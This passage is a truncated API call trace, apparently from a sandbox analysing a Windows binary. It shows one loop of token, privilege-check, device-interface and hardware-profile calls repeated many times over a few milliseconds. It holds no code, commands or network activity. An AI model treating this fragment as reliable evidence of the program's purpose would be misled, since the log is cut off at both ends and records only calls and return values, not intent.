TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.829] GetLastError () returned 0x3f0 [0084.829] GetCurrentProcess () returned 0xffffffff [0084.829] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.829] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.829] SetLastError (dwErrCode=0x522) [0084.829] CloseHandle (hObject=0x114) returned 1 [0084.829] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.829] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.830] GetLastError () returned 0x578 [0084.830] SetLastError (dwErrCode=0x578) [0084.830] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.830] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.830] GetCurrentThread () returned 0xfffffffe [0084.830] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.830] GetLastError () returned 0x3f0 [0084.830] GetCurrentProcess () returned 0xffffffff [0084.830] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.830] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.830] SetLastError (dwErrCode=0x522) [0084.830] CloseHandle (hObject=0x114) returned 1 [0084.830] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.830] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.830] GetLastError () returned 0x578 [0084.830] SetLastError (dwErrCode=0x578) [0084.830] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.830] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.830] GetCurrentThread () returned 0xfffffffe [0084.830] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.830] GetLastError () returned 0x3f0 [0084.830] GetCurrentProcess () returned 0xffffffff [0084.830] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.830] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.830] SetLastError (dwErrCode=0x522) [0084.830] CloseHandle (hObject=0x114) returned 1 [0084.830] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.830] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.830] GetLastError () returned 0x578 [0084.830] SetLastError (dwErrCode=0x578) [0084.830] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.830] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.830] GetCurrentThread () returned 0xfffffffe [0084.830] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.830] GetLastError () returned 0x3f0 [0084.830] GetCurrentProcess () returned 0xffffffff [0084.830] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.830] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.831] SetLastError (dwErrCode=0x522) [0084.831] CloseHandle (hObject=0x114) returned 1 [0084.831] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.831] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.831] GetLastError () returned 0x578 [0084.831] SetLastError (dwErrCode=0x578) [0084.831] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.831] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.831] GetCurrentThread () returned 0xfffffffe [0084.831] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.831] GetLastError () returned 0x3f0 [0084.831] GetCurrentProcess () returned 0xffffffff [0084.831] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.831] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.831] SetLastError (dwErrCode=0x522) [0084.831] CloseHandle (hObject=0x114) returned 1 [0084.831] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.831] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.831] GetLastError () returned 0x578 [0084.831] SetLastError (dwErrCode=0x578) [0084.831] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.831] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.831] GetCurrentThread () returned 0xfffffffe [0084.831] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.831] GetLastError () returned 0x3f0 [0084.831] GetCurrentProcess () returned 0xffffffff [0084.831] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.831] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.831] SetLastError (dwErrCode=0x522) [0084.831] CloseHandle (hObject=0x114) returned 1 [0084.831] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.831] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.831] GetLastError () returned 0x578 [0084.831] SetLastError (dwErrCode=0x578) [0084.831] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.831] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.831] GetCurrentThread () returned 0xfffffffe [0084.831] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.832] GetLastError () returned 0x3f0 [0084.832] GetCurrentProcess () returned 0xffffffff [0084.832] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.832] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.832] SetLastError (dwErrCode=0x522) [0084.832] CloseHandle (hObject=0x114) returned 1 [0084.832] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.832] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.832] GetLastError () returned 0x578 [0084.832] SetLastError (dwErrCode=0x578) [0084.832] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.832] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.832] GetCurrentThread () returned 0xfffffffe [0084.832] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.832] GetLastError () returned 0x3f0 [0084.832] GetCurrentProcess () returned 0xffffffff [0084.832] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.832] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.832] SetLastError (dwErrCode=0x522) [0084.832] CloseHandle (hObject=0x114) returned 1 [0084.832] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.832] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.832] GetLastError () returned 0x578 [0084.832] SetLastError (dwErrCode=0x578) [0084.832] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.832] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.832] GetCurrentThread () returned 0xfffffffe [0084.832] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.832] GetLastError () returned 0x3f0 [0084.832] GetCurrentProcess () returned 0xffffffff [0084.832] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.832] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.832] SetLastError (dwErrCode=0x522) [0084.832] CloseHandle (hObject=0x114) returned 1 [0084.832] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.832] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.832] GetLastError () returned 0x578 [0084.832] SetLastError (dwErrCode=0x578) [0084.832] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.832] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.833] GetCurrentThread () returned 0xfffffffe [0084.833] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.833] GetLastError () returned 0x3f0 [0084.833] GetCurrentProcess () returned 0xffffffff [0084.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.833] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.833] SetLastError (dwErrCode=0x522) [0084.833] CloseHandle (hObject=0x114) returned 1 [0084.833] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.833] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.833] GetLastError () returned 0x578 [0084.833] SetLastError (dwErrCode=0x578) [0084.833] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.833] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.833] GetCurrentThread () returned 0xfffffffe [0084.833] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.833] GetLastError () returned 0x3f0 [0084.833] GetCurrentProcess () returned 0xffffffff [0084.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.833] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.833] SetLastError (dwErrCode=0x522) [0084.833] CloseHandle (hObject=0x114) returned 1 [0084.833] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.833] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.833] GetLastError () returned 0x578 [0084.833] SetLastError (dwErrCode=0x578) [0084.833] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.833] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.833] GetCurrentThread () returned 0xfffffffe [0084.833] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.833] GetLastError () returned 0x3f0 [0084.833] GetCurrentProcess () returned 0xffffffff [0084.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.833] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.833] SetLastError (dwErrCode=0x522) [0084.833] CloseHandle (hObject=0x114) returned 1 [0084.833] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.833] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.833] GetLastError () returned 0x578 [0084.834] SetLastError (dwErrCode=0x578) [0084.834] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.834] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.834] GetCurrentThread () returned 0xfffffffe [0084.834] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.834] GetLastError () returned 0x3f0 [0084.834] GetCurrentProcess () returned 0xffffffff [0084.834] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.834] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.834] SetLastError (dwErrCode=0x522) [0084.834] CloseHandle (hObject=0x114) returned 1 [0084.834] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.834] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.834] GetLastError () returned 0x578 [0084.834] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.834] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.834] GetCurrentThread () returned 0xfffffffe [0084.834] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.834] GetLastError () returned 0x3f0 [0084.834] GetCurrentProcess () returned 0xffffffff [0084.834] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.834] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.834] SetLastError (dwErrCode=0x522) [0084.834] CloseHandle (hObject=0x114) returned 1 [0084.834] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.834] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.834] GetLastError () returned 0x578 [0084.834] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.834] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.834] GetCurrentThread () returned 0xfffffffe [0084.834] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.834] GetLastError () returned 0x3f0 [0084.834] GetCurrentProcess () returned 0xffffffff [0084.834] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.834] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.834] SetLastError (dwErrCode=0x522) [0084.834] CloseHandle (hObject=0x114) returned 1 [0084.834] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.834] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.834] GetLastError () returned 0x578 [0084.834] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.835] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.835] GetCurrentThread () returned 0xfffffffe [0084.835] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.835] GetLastError () returned 0x3f0 [0084.835] GetCurrentProcess () returned 0xffffffff [0084.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.835] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.835] SetLastError (dwErrCode=0x522) [0084.835] CloseHandle (hObject=0x114) returned 1 [0084.835] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.835] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.835] GetLastError () returned 0x578 [0084.835] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.835] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.835] GetCurrentThread () returned 0xfffffffe [0084.835] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.835] GetLastError () returned 0x3f0 [0084.835] GetCurrentProcess () returned 0xffffffff [0084.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.835] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.835] SetLastError (dwErrCode=0x522) [0084.835] CloseHandle (hObject=0x114) returned 1 [0084.835] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.835] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.835] GetLastError () returned 0x578 [0084.835] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.835] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.835] GetCurrentThread () returned 0xfffffffe [0084.835] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.835] GetLastError () returned 0x3f0 [0084.835] GetCurrentProcess () returned 0xffffffff [0084.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.835] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.835] SetLastError (dwErrCode=0x522) [0084.835] CloseHandle (hObject=0x114) returned 1 [0084.835] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.835] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.835] GetLastError () returned 0x578 [0084.836] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.836] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.836] GetCurrentThread () returned 0xfffffffe [0084.836] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.836] GetLastError () returned 0x3f0 [0084.836] GetCurrentProcess () returned 0xffffffff [0084.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.836] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.836] SetLastError (dwErrCode=0x522) [0084.836] CloseHandle (hObject=0x114) returned 1 [0084.836] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.836] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.836] GetLastError () returned 0x578 [0084.836] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.836] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.836] GetCurrentThread () returned 0xfffffffe [0084.836] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.836] GetLastError () returned 0x3f0 [0084.836] GetCurrentProcess () returned 0xffffffff [0084.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.836] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.836] SetLastError (dwErrCode=0x522) [0084.836] CloseHandle (hObject=0x114) returned 1 [0084.836] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.836] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.836] GetLastError () returned 0x578 [0084.836] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.836] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.836] GetCurrentThread () returned 0xfffffffe [0084.836] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.836] GetLastError () returned 0x3f0 [0084.836] GetCurrentProcess () returned 0xffffffff [0084.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.836] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.836] SetLastError (dwErrCode=0x522) [0084.836] CloseHandle (hObject=0x114) returned 1 [0084.836] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.836] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.836] GetLastError () returned 0x578 [0084.836] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.836] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.836] GetCurrentThread () returned 0xfffffffe [0084.836] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.836] GetLastError () returned 0x3f0 [0084.837] GetCurrentProcess () returned 0xffffffff [0084.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.837] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.837] SetLastError (dwErrCode=0x522) [0084.837] CloseHandle (hObject=0x114) returned 1 [0084.837] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.837] 